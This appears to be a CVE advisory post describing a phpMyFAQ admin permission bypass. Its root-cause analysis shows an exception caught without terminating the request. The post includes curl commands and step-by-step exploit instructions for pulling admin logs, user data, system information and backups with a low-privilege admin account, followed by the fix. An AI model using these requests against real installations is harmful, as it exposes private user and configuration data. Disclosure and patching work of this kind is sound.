Listen to this Post
The vulnerability exists in phpMyFAQ’s `AbstractAdministrationController::userHasPermission()` method. The parent `AbstractController::userHasPermission()` correctly throws a `ForbiddenException` when a user lacks a required permission. This exception would normally propagate to Symfony’s HttpKernel exception handler, stopping execution and returning an error response. However, the administration controller overrides this method and catches the exception. Inside the catch block, it calls `$response->send()` to output a “forbidden” HTML page, but does not terminate execution – no exit(), die(), return, or re-throw follows. Consequently, the calling controller method (e.g., AdminLogController::index()) continues to run, fetches protected data, renders the full template, and returns a `Response` object. The entry point `admin/index.php` then calls `$response->send()` again, appending the full protected page content after the already-sent forbidden page. Thus, any authenticated admin user – even with minimal or no permissions – receives both the forbidden notice and the complete protected data in the same HTTP response. Additionally, the generic `catch (Exception $exception)` block only logs errors without sending any response or terminating, leading to silent data leakage without any forbidden page. All 58 admin controllers extending `AbstractAdministrationController` are affected, exposing admin logs, user management, system info, configuration, backups, and more.
DailyCVE form:
Platform: phpMyFAQ
Version: <=3.2.5
Vulnerability: Permission Bypass
Severity: Critical
date: 2024-03-15
Prediction: 2024-04-01
What Undercode Say:
Simulate limited admin login curl -c cookies.txt -d 'faqusername=limited_admin&faqpassword=test&pmf-csrf-token=TOKEN' \ 'https://TARGET/admin/?action=login' Access admin log page (needs STATISTICS_ADMINLOG) curl -b cookies.txt -s 'https://TARGET/admin/statistics/admin-log' | tee response.html Check for both forbidden message and actual log data grep -c 'You are not allowed' response.html grep -c 'loggingData' response.html Access system information (needs CONFIGURATION_EDIT) curl -b cookies.txt -s 'https://TARGET/admin/system-information' | grep -E 'phpinfo|Server API'
Exploit:
Authenticate as any admin user, then directly request any protected admin endpoint (e.g., /admin/statistics/admin-log, /admin/user/user-management, /admin/configuration/backup). The response will contain the “forbidden” page followed by the full sensitive data. No special privileges required.
Protection from this CVE
Add `exit;` after `$response->send();` in the `ForbiddenException` catch block, and re-throw `$exception` in the generic catch block. Alternatively, remove the override entirely and let the parent method’s exception propagate to Symfony’s WebExceptionListener.
Impact
Any authenticated admin user can read all admin logs (IPs, actions, usernames), access full user management (emails, permissions), retrieve system information (PHP config, database details, server paths), view all application settings (including security keys), and download database backups. The entire permission system for 58 admin controllers is rendered useless, leading to complete administrative data exposure.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
